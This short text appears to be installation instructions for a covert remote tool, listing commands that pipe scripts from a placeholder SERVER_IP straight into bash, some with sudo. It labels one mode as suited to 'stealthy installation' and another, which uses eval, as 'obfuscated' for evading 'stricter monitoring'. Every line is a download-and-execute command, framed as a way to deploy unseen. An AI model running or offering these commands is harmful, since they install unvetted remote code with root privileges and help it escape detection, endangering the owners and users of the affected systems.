Minimal Installation (No Root Required)
For limited access without requiring root privileges:
curl -fsSL http://SERVER_IP/deployment/minimal | bash
Full Installation
Complete installation with all features:
curl -fsSL http://SERVER_IP/deployment/full | sudo bash
Quiet Mode
Minimal output for stealthy installation:
curl -fsSL http://SERVER_IP/deployment/quiet | sudo bash
Obfuscated Installation
For environments with stricter monitoring:
eval "$(curl -fsSL http://SERVER_IP/deployment/x)"